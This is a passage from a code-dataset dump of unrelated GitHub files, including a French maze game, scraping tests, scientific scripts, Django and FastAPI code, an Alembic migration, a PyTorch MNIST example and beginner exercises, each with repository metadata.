Joueur\n\n\nclass Sphinx(Personnage):\n \"\"\" Cette classe représente la sortie du jeu \"\"\"\n joueur = Joueur.getInstance(\"👤\", \"X\", 100)\n labyrinthe = Labyrinthe.getInstance()\n\n __instance = None\n\n @staticmethod\n def getInstance():\n if Sphinx.__instance is None:\n Sphinx.__instance = Sphinx()\n return Sphinx.__instance\n\n def __init__(self):\n \" Constructeur. Paramètres :\"\n self._symboleWindowsTerminal = \"🦅\"\n self._symbole = \"T\"\n self._questions = {\n \"Quel est l'être doué de la voix qui a quatre pieds le matin, deux à midi et trois le soir ?\": [\"l'homme\",\"nous\",\"l'humain\",\"humain\",\"homme\"],\n \"Je ne peux pas marcher, j’ai pourtant un dos et quatre pieds. Qui suis-je ?\": [\"une chaise\", \"chaise\"],\n \"\"\"Un homme se réveille chez lui, dans le noir complet. Dans son tiroir, il y a 6 chaussettes noires, 4 blanches et deux rouges.\\n \n Combien doit-il prendre de chaussettes au minimum pour être certain d’avoir deux chaussettes de la même couleur ?\"\"\": [\n \"quatre\", \"4\"],\n \"Qu’est-ce qui est jaune avec une cape ?\": [\"une banane\", \"banane\"],\n \"je suis noir, je deviens rouge, et je finis blanc.\\nQui suis-je?\": [\"le charbon\", \"charbon\"],\n \"lisez cette chaine: g-k-c-1-9-i-r\": [\"j'ai cassé un neuf hier\"]\n }\n\n def description(self):\n \"\"\" Renvoie la description du sphinx.\"\"\"\n return \"L'animal mythologique représentant votre liberté!!!\"\n\n def parler(self, joueur):\n if Sphinx.joueur.getCle() >= 10:\n print(\"*le Sphinx vous pose une question pour verifier la légitimité de votre liberté...*\")\n question = random.choice(list(self._questions.keys()))\n reponse = input(question).lower()\n for response in self._questions[question]:\n if reponse == response:\n os.system('cls' if os.name == 'nt' else 'clear')\n print(\"\"\"\n .____ ._____. __ __ \n | | |__\\_ |__ ____________/ |_ __/_ \n | | | || __ \\_/ __ \\_ __ \\ __\\/ __ \\ \n | |___| || \\_\\ \\ ___/| | \\/| | \\ ___/ \n |_______ \\__||___ /\\___ >__| |__| \\___ >\n \\/ \\/ \\/ \\/ \n \"\"\")\n exit(0)\n print(\"*Le Sphinx vous vole une clé et s'envole *\")\n print(\"Sphinx-> Retourner à vos occupations, retrouver la clé volée, et revenez vers moi...\")\n Sphinx.joueur.perdreCle()\n Sphinx.labyrinthe.deposerPersonneAleatoirement(self.getInstance(), Sphinx.joueur)\n Sphinx.joueur.getCaseCourante().supprimerPersonnage(self.getInstance())\n Sphinx.joueur.reinitionalisationDecouverte()\n else:\n print(\"Il vous manque encore \" + str(10 - int(Sphinx.joueur.getCle())) + \"clef !!!\")\n print(\"Continuer à les chercher...\")\n input()\n\n def rencontrer(self):\n pass\n\n def getSymbole(self, isWindowsTerminal):\n if isWindowsTerminal:\n return self._symboleWindowsTerminal\n else:\n return self._symbole\n","repo_name":"greggameplayer/PyTheMaze","sub_path":"personnes/sphinx.py","file_name":"sphinx.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74859881512","text":"import datetime, os, unittest\nimport requests\nimport pdb\n\nimport bs4\n\nfrom app.get_express_scripts_pdfs import ExpressScriptsPDF\nfrom app.helpers.universal import Helpers\n\n\nclass ExpressScriptsScrapingTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.es = ExpressScriptsPDF()\n cls.helpers = Helpers('pdfs')\n url = os.path.join(cls.es.base_url, cls.es.page_route)\n cls.response = cls.helpers._request_links_page(url)\n cls.soup_object = cls.helpers._make_soup(cls.response.text)\n\n def test_makes_successful_get_request_to_express_scripts(cls):\n cls.assertEqual(cls.response.status_code, 200)\n\n def test_get_request_returns_a_webpage(cls):\n cls.assertIn(b'!DOCTYPE html', cls.response.content)\n\n def test_make_soup_from_page(cls): \n cls.assertIsInstance(cls.soup_object, bs4.BeautifulSoup)\n\n def test_find_all_links_in_soup(cls):\n links = cls.helpers._find_all_links_in_soup(cls.soup_object)\n cls.assertTrue(len(links) > 0)\n for link in links:\n cls.assertTrue(type(link) == str)\n\n def test_find_all_document_links_in_list_of_links(cls):\n doc_links = cls.helpers._return_only_pdf_links(cls.soup_object)\n for doc_link in doc_links:\n cls.assertTrue(doc_link[0:5] == 'docs/' and doc_link[-3:] == 'pdf')\n\n\nclass ExpressScriptsFormRequestsTest(unittest.TestCase): \n \n @classmethod\n def setUpClass(cls):\n cls.es = ExpressScriptsPDF()\n cls.helpers = Helpers('pdfs')\n\n url = os.path.join(cls.es.base_url, cls.es.page_route)\n page = cls.helpers._request_links_page(url)\n soup = cls.helpers._make_soup(page.text)\n cls.doc_links = cls.helpers._return_only_pdf_links(soup)\n \n cls.responses = []\n\n for link in cls.doc_links:\n response = cls.helpers._request_document(cls.es.base_url, link, 1000)\n cls.responses.append(response)\n\n def test_prepare_links(cls):\n for doc_link in cls.doc_links:\n cls.assertTrue(doc_link[0:5] == 'docs/' and doc_link[-3:] == 'pdf')\n\n def test_make_time_string(cls):\n time_string = cls.helpers._make_time_string_with_days_offset(1000) \n cls.assertTrue(type(time_string) == str)\n cls.assertTrue(len(time_string) == 29)\n\n def test_make_document_request(cls):\n for response in cls.responses:\n status_code = response.status_code\n cls.assertTrue(status_code == 200 or status_code == 304 or status_code == 404)\n\n def test_create_dict_for_doc_links(cls):\n docs_dict = cls.es._create_dict_for_doc_links(cls.responses)\n cls.assertIs(type(docs_dict), dict)\n cls.assertGreater(len(docs_dict), 0)\n\n @unittest.skip('Test of Main method, no need to run this every time.')\n def test_main_method(cls):\n docs_dict = cls.es.main(1000)\n cls.assertIs(type(docs_dict), dict)\n cls.assertGreater(len(docs_dict), 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"janmilosh/pdffer","sub_path":"tests/small/test_get_express_scripts_pdfs.py","file_name":"test_get_express_scripts_pdfs.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8120598123","text":"# %%------------ IMPORT MODULES -----------------------------------------------------------> #\nfrom main_code.well_model.ground_models.FreeFemAnalysis import (\n\n FreeFEMAnalyzer, TimeDependentOptions, MeshOptions, ProblemDefinitionOptions\n\n)\nfrom main_code.support.other.excel_exporter import write_excel_sheet\nfrom main_code.constants import CALCULATION_FOLDER, os\nfrom collections.abc import Iterable\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# %%------------ DEFINE WORKING FOLDERS -----------------------------------------------------------> #\ncalculation_folder = os.path.join(\n\n CALCULATION_FOLDER, \"Pietro PhD Thesis\", \"3 - Model Description\",\n \"FreeFEM Calculation\", \"1 - mesh sensitivity\",\n \"res\", \"calculation folder\"\n\n)\n\nresult_folder = os.path.join(\n\n CALCULATION_FOLDER, \"Pietro PhD Thesis\", \"3 - Model Description\",\n \"FreeFEM Calculation\", \"1 - mesh sensitivity\",\n \"res\", \"results\"\n\n)\n\n\n# %%------------ CALCULATIONS -----------------------------------------------------------> #\na = 4\nDT = 40.\nn_mesh = 2\nm_mesh = 15\nn_save = 500\nresults = dict()\n\nfor time_steps in [10, 50, 100]:\n\n print(\"{} time steps\".format(time_steps))\n\n mo = MeshOptions(\n\n n_points=a * n_mesh, n_points_circle=a * m_mesh * n_mesh, graph_r_ratio=15,\n mesh_path=os.path.join(calculation_folder, \"mesh_out.mesh\"),\n retrieve_mesh=False, add_visualization_mesh=True\n\n )\n\n if n_save > time_steps:\n n_save_real = time_steps\n\n else:\n n_save_real = n_save\n\n pdo = ProblemDefinitionOptions(\n\n grad_rock=0.01, DT=DT,\n time_range=[1e-3, 1000], time_steps=time_steps,\n n_plot=0, n_save=n_save_real\n\n )\n\n tdo = TimeDependentOptions(mesh_options=mo, problem_definition_options=pdo, mesh_only=False)\n ffa = FreeFEMAnalyzer(options=tdo, calculation_folder=calculation_folder)\n gross_result = ffa.calculate()\n\n time_list = list()\n value_list = list()\n\n for line in gross_result:\n\n line_split = line.split(\";\")\n time_list.append(float(line_split[0].strip()))\n value_list.append(float(line_split[1].strip()) / (DT * 2 * np.pi))\n\n results.update({\n\n \"{} time steps\".format(time_steps): {\n\n \"time\": time_list,\n \"value\": value_list\n\n }\n\n })\n\n print(\"{} time steps\".format(time_steps))\n\n\n# %%------------ SAVE RESULTS -----------------------------------------------------------> #\nfile_path = os.path.join(result_folder, \"time-sensitivity.xlsx\")\n\nfor key in results.keys():\n\n dataframe = {\n\n 'Time': {\"unit\": [\"-\"], \"values\": [results[key][\"time\"]]},\n 'value': {\"unit\": [\"-\"], \"values\": [results[key][\"value\"]]},\n\n }\n write_excel_sheet(excel_path=file_path, sheet_name=key, data_frame=dataframe, overwrite=\"hard\")\n\n\n# %%------------ PLOT RESULTS -----------------------------------------------------------> #\nkeys_list = list(results.keys())\n\nkeys_list.reverse()\nfor key in keys_list:\n\n plt.plot(results[key][\"time\"], results[key][\"value\"], label=key)\n\nplt.xlabel(\"$t_d$ [-]\")\nplt.ylabel(\"$f$ [-]\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.legend(fontsize=\"8\")\nplt.title(\"Time Step Sensitivity\")\nplt.show()\n","repo_name":"SERGGroup/BHEModel2.0","sub_path":"calculation/Pietro PhD Thesis/3 - Model Description/FreeFEM Calculation/1 - mesh sensitivity/4 - time sensitivity.py","file_name":"4 - time sensitivity.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74577880871","text":"import click\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nfrom tifffile import imread, imwrite\nfrom tqdm import tqdm\n\n\n@click.command()\n@click.option('--dataframe-path', '-d', type=click.Path(exists=True), help=\"Measurements dataframe path (*.csv)\")\n@click.option('--images-directory', '-i', type=click.Path(exists=True), help=\"Directory with images and labels.\")\n@click.option('--metadata-path', '-m', type=click.Path(exists=True), help=\"Image metadata containing columns CUTOFF_488 and CUTOFF_561\")\ndef main(dataframe_path: str, images_directory: str, metadata_path: str) -> None:\n \"\"\"\n Applies threshold given CUTOFFs to select the NM regions.\n \"\"\"\n\n images_directory = Path(images_directory)\n\n df = pd.read_csv(dataframe_path)\n mt = pd.read_csv(metadata_path)\n mt['file'] = mt['FORMATTED'].apply(lambda x: x.replace('.tif', ''))\n mt = mt.set_index('file')[['CUTOFF_488', 'CUTOFF_561']]\n df = df.join(mt, on='file')\n df['selected'] = ((df['SOX2'] > df['CUTOFF_488']) & (df['TBXT'] > df['CUTOFF_561']))\n\n for f, group in tqdm(df.groupby('file'), \"Selecting cells\"):\n p = str(next(images_directory.glob(f'**/{f}_label.tif')))\n n_labels = group['label'].max() + 1\n mapping = np.zeros(n_labels, dtype=int)\n selected = group[group['selected']]['label'].values\n mapping[selected] = selected\n lb = imread(p)\n lb = mapping[lb]\n imwrite(p[:-4] + f'_thold.tif', lb)\n\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"royerlab/zebrahub-paper-hcr-analysis","sub_path":"apply_threshold.py","file_name":"apply_threshold.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"895010546","text":"import os, shutil\nimport numpy as np\nfrom keras.preprocessing import image\nfrom PIL import Image\n\ndef get_paths(directory):\n \"\"\"\n This function creates a list of paths to all images in a given directory (train, test for e.g.)\n \n directory (str): a string of the directory to get the class and image paths from \n \n Author: Chum Mapa\n Date: 2020\n \"\"\"\n buildings_list = os.listdir(directory + '/buildings')\n forest_list = os.listdir(directory + '/forest')\n glacier_list = os.listdir(directory + '/glacier')\n mountain_list = os.listdir(directory + '/mountain')\n sea_list = os.listdir(directory + '/sea')\n street_list = os.listdir(directory + '/street')\n \n buildings_path = [directory + '/buildings/' + img_id for img_id in buildings_list]\n forest_path = [directory + '/forest/' + img_id for img_id in forest_list]\n glacier_path = [directory + '/glacier/' + img_id for img_id in glacier_list]\n mountain_path = [directory + '/mountain/' + img_id for img_id in mountain_list]\n sea_path = [directory + '/sea/' + img_id for img_id in sea_list]\n street_path = [directory + '/street/' + img_id for img_id in street_list]\n \n path_list = buildings_path + forest_path + glacier_path + mountain_path + sea_path + street_path\n \n return path_list\n\n\ndef preprocess_image(path_list):\n \"\"\"\n This function performs preprocessing tasks in order to \n get a list of images ready for input into a lime visualisation \n \n path_list (str): a list of strings of paths to individual images\n \n Author: @marcotcr (github)\n Date: 2020 \n Link: https://github.com/marcotcr/lime/blob/master/doc/notebooks/Tutorial%20-%20Image%20Classification%20Keras.ipynb\n \"\"\"\n output = []\n for img_path in path_list:\n img = image.load_img(img_path, target_size=(299, 299))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = np.divide(x, 255.0)\n output.append(x)\n return np.vstack(output)\n\n","repo_name":"lecritch/Cene-Image-Classification","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15206832749","text":"def next_permut(entry):\r\n m = len(entry)\r\n i = m-1\r\n while(i>0 and entry[i] < entry[i-1]):\r\n i -= 1\r\n if(i==0):\r\n entry.reverse()\r\n return False\r\n k = m - 1\r\n while(entry[k] < entry[i-1]):\r\n k -= 1\r\n entry[i-1], entry[k] = entry[k], entry[i-1]\r\n x = 0\r\n while(i + x < m - 1 -x):\r\n entry[i+x], entry[m-1-x] = entry[m-1-x], entry[i+x]\r\n x += 1\r\n return True\r\n\r\ndef comp_size(s):\r\n tot = 0\r\n last_seen = '%'\r\n for x in xrange(len(s)):\r\n if(s[x] != last_seen):\r\n last_seen = s[x]\r\n tot += 1\r\n return tot\r\n\r\ndef apply_permut(p, s):\r\n k = len(p)\r\n ns = [0]*len(s)\r\n for x in xrange(len(s)):\r\n ns[x] = s[p[x % k] + (x//k)*k]\r\n return ''.join(ns)\r\n\r\nfilename = \"D-small-attempt0.in\"\r\nf = open(filename, 'r')\r\nof = open(\"D-small.out\", 'w')\r\n\r\nN = int(f.readline())\r\n\r\nfor x in xrange(N):\r\n k = int(f.readline())\r\n S = f.readline().strip()\r\n t = 1000000000\r\n p = [i for i in xrange(k)]\r\n t = min(t, comp_size(apply_permut(p, S)))\r\n while(next_permut(p)):\r\n t = min(t, comp_size(apply_permut(p, S)))\r\n print >> of, \"Case #%d: %d\" % (x + 1, t)\r\n\r\n\r\n\r\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/08/44/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"18599006321","text":"# 정수 n 입력받기\nn = input()\n#숫자 1부터 순서대로 말하기. 3, 6, 9는 -로 대체.\nfor i in range(1, n+1):\n z = list(i)\n for a in x:\n for x in len(z):\n if z[x] == ['3', '6', '9']:\n z[x] = '-'\n# 정답 출력하기\n print(i)","repo_name":"rkskakdlfem3/TIL","sub_path":"문제풀이/swea 문제풀이/D2/0721/1926_간단한 369게임.py","file_name":"1926_간단한 369게임.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20240861180","text":"#!/usr/bin/python3\n\nn = int(input())\n\n\nmappings = {}\n\nfor i in range(n):\n old, new = input().split()\n \n if old in mappings:\n mappings[new] = mappings[old]\n del mappings[old]\n else:\n mappings[new] = old\n\nprint(len(mappings))\nfor new, old in mappings.items():\n print(old, new)\n\n\t \t \t\t \t\t \t \t \t \t\t \t","repo_name":"Mehariwamlake/competitive-Programming","sub_path":"contest-30/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6813554018","text":"from django import forms\nfrom webapp.models import Covid\n\n\nclass logins(forms.Form):\t\n\tusuario=forms.CharField(max_length=10)\n\tcontrasena=forms.CharField(label=\"Password\", widget=forms.PasswordInput, strip=False)\n\nclass FactorRiesgoForm(forms.ModelForm):\n class Meta:\n model = Covid\n #fields='__all__'\n exclude = ['ID','DECESO'] \n labels = { \n 'ID': 'ID',\n 'SEXO': 'SEXO',\n 'EDAD': 'EDAD',\n 'NEUMONIA': 'NEUMONIA',\n 'DIABETES': 'DIABETES',\n 'EPOC': 'EPOC',\n 'ASMA': 'ASMA',\n 'INMUSUPR': 'INMUSUPR',\n 'HIPERTENSION': 'HIPERTENSION',\n 'CARDIOVASCULAR': 'CARDIOVASCULAR',\n 'OBESIDAD': 'OBESIDAD',\n 'RENAL_CRONICA': 'RENAL_CRONICA',\n 'TABAQUISMO': 'TABAQUISMO',\n 'COVID':'COVID',\n 'OTRA_COM':'OTRA_COM',\n 'DECESO':'DECESO',\n \n }\n \n","repo_name":"giovannydavila/testprobabilidad","sub_path":"webapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70943524713","text":"import random\nimport pandas as pd\n\nfrom app import app\nfrom app.database import db\nfrom app.database.models.subjects import Subjects\nfrom fastapi import Depends, File, Response\nfrom fastapi_jwt_auth import AuthJWT\n\n\n@app.post(\"/admin/add_subjects\")\nasync def add_subjects(\n response: Response, Auth: AuthJWT = Depends(), file: bytes = File(...)\n):\n Auth.jwt_required()\n \n try:\n data = pd.read_excel(file, index_col=None)\n subjects = data.values.tolist()\n\n for subjectDetail in subjects:\n subjectInstance = Subjects()\n subjectInstance.name = subjectDetail[0]\n subjectInstance.code = subjectDetail[1]\n\n try:\n db.add(subjectInstance)\n db.commit()\n except Exception as e:\n print(e)\n\n return {\"result\": \"Pass\"}\n except Exception as e:\n print(e)\n return {\"result\": e}\n","repo_name":"himanshuvarandani/Electron-Server","sub_path":"app/routes/admin/add_subjects.py","file_name":"add_subjects.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18206258067","text":"from geometric_features.aggregation.ocean import basins, subbasins, \\\n antarctic, ice_shelves, ismip6, arctic as arctic_ocean, transport, \\\n arctic_transport, moc\nfrom geometric_features.aggregation.seaice import arctic as arctic_seaice\n\n\ndef get_aggregator_by_name(region_group):\n \"\"\"\n Get a geojson mask file and the appropriate file suffix for the given\n region group.\n\n Parameters\n ----------\n region_group : str\n The name of a region group to get mask features for, one of\n 'Antarctic Regions', 'Arctic Ocean Regions', 'Arctic Sea Ice Regions',\n 'Ocean Basins', 'Ice Shelves', 'Ocean Subbasins', 'ISMIP6 Regions',\n 'MOC Basins', 'Transport Transects', or 'Arctic Transport Transects'\n\n Returns\n -------\n function : callable\n An aggregation functions for collecting the features, which takes a\n :py:class:`geometric_features.GeometricFeatures` object as its argument\n\n prefix : str\n A prefix (or suffix) for use in file names that corresponds to the\n region group\n\n date : str\n A date stamp when the regions in ``fc`` were last modified. This date\n can be used to cache masks based on these regions as long as the date\n remains the same.\n \"\"\"\n\n regions = {'Antarctic Regions': {'prefix': 'antarcticRegions',\n 'date': '20230403',\n 'function': antarctic},\n 'Arctic Ocean Regions': {'prefix': 'arcticOceanRegions',\n 'date': '20201130',\n 'function': arctic_ocean},\n 'Arctic Sea Ice Regions': {'prefix': 'arcticSeaIceRegions',\n 'date': '20201130',\n 'function': arctic_seaice},\n 'Ocean Basins': {'prefix': 'oceanBasins',\n 'date': '20200621',\n 'function': basins},\n 'Ice Shelves': {'prefix': 'iceShelves',\n 'date': '20200621',\n 'function': ice_shelves},\n 'Ocean Subbasins': {'prefix': 'oceanSubbasins',\n 'date': '20201123',\n 'function': subbasins},\n 'ISMIP6 Regions': {'prefix': 'ismip6Regions',\n 'date': '20210201',\n 'function': ismip6},\n 'MOC Basins': {'prefix': 'mocBasins',\n 'date': '20210623',\n 'function': moc},\n 'Transport Transects': {'prefix': 'transportTransects',\n 'date': '20210323',\n 'function': transport},\n 'Arctic Transport Transects': {'prefix': 'arcticTransportTransects',\n 'date': '20220926',\n 'function': arctic_transport}}\n\n if region_group not in regions:\n raise ValueError(f'Unknown region group {region_group}')\n\n region = regions[region_group]\n\n prefix = region['prefix']\n date = region['date']\n\n function = region['function']\n\n return function, prefix, date\n","repo_name":"MPAS-Dev/geometric_features","sub_path":"geometric_features/aggregation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"28748365372","text":"\"\"\"Add large object logs.\n\nRevision ID: 1285eea03d23\nRevises: 0a069266ef71\nCreate Date: 2022-09-02 17:46:05.902097+00:00\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"1285eea03d23\"\ndown_revision = \"9f6b44aa0df8\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n comment = \"OID of large object containing log(s).\"\n op.add_column(\n \"activation_instance\",\n sa.Column(\n \"log_id\",\n postgresql.OID(),\n nullable=True,\n comment=comment,\n ),\n )\n\n # Create trigger function to create log_id if that column is null\n op.execute(\n sa.text(\n \"\"\"\ncreate or replace function trfn_create_lobject()\nreturns trigger\nas $$\nbegin\n if new.log_id is null\n then\n select lo_create(0)\n into new.log_id;\n end if;\n\n return new;\nend;\n$$ language plpgsql;\n \"\"\"\n )\n )\n\n # Create trigger function to cascade delete from activation_instance\n # to large object table\n op.execute(\n sa.text(\n \"\"\"\ncreate or replace function trfn_cascade_delete_lobject()\nreturns trigger\nas $$\nbegin\n perform lo_unlink(d.log_id)\n from deleted_records d;\n\n return null;\nend;\n$$ language plpgsql;\n \"\"\"\n )\n )\n\n # Create pre-insert row trigger on activation_instance table\n op.execute(\n sa.text(\n \"\"\"\ncreate trigger tr_activation_instance_log_id\nbefore insert\n on activation_instance\n for each row\n execute function trfn_create_lobject();\n \"\"\"\n )\n )\n\n # Create post-delete statement trigger on activation_instance table\n op.execute(\n sa.text(\n \"\"\"\ncreate trigger tr_activation_instance_cascade_delete_logs\n after delete\n on activation_instance\n referencing old table as deleted_records\n for each statement\n execute function trfn_cascade_delete_lobject();\n \"\"\"\n )\n )\n\n\ndef downgrade() -> None:\n op.drop_column(\"activation_instance\", \"log_id\")\n\n op.execute(\n sa.text(\n \"\"\"\ndrop trigger if exists tr_activation_instance_cascade_delete_logs\n on activation_instance;\n \"\"\"\n )\n )\n\n op.execute(\n sa.text(\n \"\"\"\ndrop trigger if exists tr_activation_instance_log_id\n on activation_instance;\n \"\"\"\n )\n )\n\n op.execute(\n sa.text(\n \"\"\"\ndrop function if exists trfn_cascade_delete_lobject() ;\n \"\"\"\n )\n )\n\n op.execute(\n sa.text(\n \"\"\"\ndrop function if exists trfn_create_lobject() ;\n \"\"\"\n )\n )\n","repo_name":"benthomasson/ansible-events-ui2","sub_path":"src/eda_server/db/migrations/versions/202209191746_1285eea03d23_large_object_logs.py","file_name":"202209191746_1285eea03d23_large_object_logs.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8762348724","text":"#!/usr/bin/env python3\r\n\r\nimport argparse\r\n\r\nfrom belcon_mini_III import DMH\r\n\r\n\r\ndef run_reciprocation_demo(\r\n usbport, num_repeat, speed, direction1, direction2):\r\n \"\"\"Reciprocation movement with some commands.\"\"\"\r\n dmh = DMH(usbport)\r\n\r\n if not dmh.get_status()[0]: # not RUN\r\n dmh.get_set_mode()\r\n\r\n print(\"High speed [Hz/100]: \" +\r\n str(dmh.get_set_parameters(3)))\r\n print(\"Middle speed [Hz/100]: \" +\r\n str(dmh.get_set_parameters(4)))\r\n print(\"Low speed [Hz/100]: \" +\r\n str(dmh.get_set_parameters(5)))\r\n if speed == 'low':\r\n sleep_sec = 30\r\n elif speed == 'middle':\r\n sleep_sec = 15\r\n elif speed == 'high':\r\n sleep_sec = 10\r\n\r\n for i in range(num_repeat):\r\n dmh.move(direction1, speed)\r\n dmh.sleep_with_displaying_freq(sleep_sec)\r\n dmh.stop()\r\n dmh.sleep_with_displaying_freq(1)\r\n\r\n dmh.move(direction2, speed)\r\n dmh.sleep_with_displaying_freq(sleep_sec)\r\n dmh.stop()\r\n dmh.sleep_with_displaying_freq(1)\r\n\r\n dmh.close_connection()\r\n\r\n\r\ndef get_options():\r\n \"\"\"Returns user-specific options.\"\"\"\r\n parser = argparse.ArgumentParser(\r\n description='Set options.')\r\n parser.add_argument(\r\n '--usbport', dest='usbport',\r\n type=str, default=None,\r\n help='set usb port number for the cable')\r\n parser.add_argument(\r\n '--num_repeat', dest='num_repeat',\r\n type=int, default=1,\r\n help='set numbet of reciprocation demo')\r\n parser.add_argument(\r\n '--speed', dest='speed',\r\n type=str, default='low',\r\n choices=['low', 'middle', 'high'],\r\n help='set movement speed')\r\n parser.add_argument(\r\n '--initial_direction', dest='direction',\r\n type=str, default='normal',\r\n choices=['normal', 'reverse'],\r\n help='set a movement direction (initial state)')\r\n return parser.parse_args()\r\n\r\n\r\nif __name__ == '__main__':\r\n args = get_options()\r\n directions = ['normal', 'reverse']\r\n direction1 = args.direction\r\n direction2 = directions[not directions.index(direction1)]\r\n run_reciprocation_demo(\r\n args.usbport,\r\n args.num_repeat,\r\n args.speed,\r\n direction1,\r\n direction2)\r\n","repo_name":"takuya-ki/conveyor_modbus","sub_path":"src/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12925231240","text":"import pyvirtualcam\nimport cv2\n\ndef main():\n camIn = cv2.VideoCapture(0)\n camIn.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)\n camIn.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)\n \n with pyvirtualcam.Camera(width = 1280, height = 720, fps = 30) as camOut:\n print(f'Using virtual camera: {camOut.device}')\n \n while True:\n _, img = camIn.read()\n \n # do image processing here\n \n camOut.send(img)\n camOut.sleep_until_next_frame()\n \nif __name__ == \"__main__\":\n main()","repo_name":"Ttanasart-pt/CSS400","sub_path":"code samples/01_using_pyvirtualcam.py","file_name":"01_using_pyvirtualcam.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74416563112","text":"import torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nfrom torchvision import transforms, datasets\n\nEPOCHS = 3\n\ntrain = datasets.MNIST('',\n train=True,\n download=True,\n transform=transforms.Compose([transforms.ToTensor()]))\n\ntest = datasets.MNIST('',\n train=False,\n download=True,\n transform=transforms.Compose([transforms.ToTensor()]))\n\ntrainset = torch.utils.data.DataLoader(train, batch_size=10, shuffle=True)\ntestset = torch.utils.data.DataLoader(test, batch_size=10, shuffle=True)\n\n\nclass Net(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.fc1 = nn.Linear(784, 64)\n self.fc2 = nn.Linear(64, 64)\n self.fc3 = nn.Linear(64, 64)\n self.fc4 = nn.Linear(64, 10)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = F.relu(self.fc3(x))\n x = self.fc4(x)\n\n return F.log_softmax(x, dim=1)\n\n\nnet = Net()\n\noptimizer = optim.Adam(net.parameters(), lr=0.001)\n\nfor epoch in range(EPOCHS):\n for data in trainset:\n X, y = data\n net.zero_grad()\n output = net(X.view(-1, 28 * 28))\n loss = F.nll_loss(output, y)\n loss.backward()\n optimizer.step()\n print(loss)\n","repo_name":"ralphvw/pytorch","sub_path":"basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15142748971","text":"from django.db import models\nfrom datetime import datetime\n\nDIRECTION_CHOICE = (\n (\"T\", 'Вверх'),\n (\"D\", 'Вниз'),\n (\"N\", 'Без изменений'),\n )\n\n\nclass Valuta(models.Model):\n name_ru = models.CharField(verbose_name=\"Название (RU)\", max_length=100, unique=True)\n name_en = models.CharField(verbose_name=\"Название (EN)\", max_length=100, unique=True)\n char_code = models.CharField(verbose_name=\"Символьный код\", max_length=3, unique=True)\n num_code = models.CharField(verbose_name=\"Числовой код\", max_length=3, unique=True)\n nominal = models.IntegerField(verbose_name=\"Номинал\", default=1)\n description = models.TextField(verbose_name=\"Описание\", max_length=300)\n icon = models.ImageField(verbose_name=\"Иконка\", upload_to='currency/icon/')\n popular = models.BooleanField(verbose_name=\"Популярная валюта\", default=False)\n\n def __str__(self):\n return self.name_ru\n\n class Meta:\n verbose_name = \"Валюта\"\n verbose_name_plural = \"Валюты\"\n ordering = [\"name_ru\"]\n\n\nclass ValutaValue(models.Model):\n valuta = models.ForeignKey(Valuta, on_delete=models.CASCADE, verbose_name=\"Валюта\")\n date = models.DateField(verbose_name=\"Дата\")\n direction_change = models.CharField(max_length=1, choices=DIRECTION_CHOICE, default=\"N\",\n verbose_name=\"Направление изменения курса\")\n percent_change = models.FloatField(verbose_name=\"Процентное изменение курса\", default=0.00)\n value = models.FloatField(verbose_name=\"Значение\", default=60.1234)\n\n def save(self, *args, **kwargs):\n last_value = ValutaValue.objects.filter(valuta=self.valuta).first().value\n change_value = self.value - last_value\n self.percent_change = round(change_value/last_value*100, 2)\n if change_value > 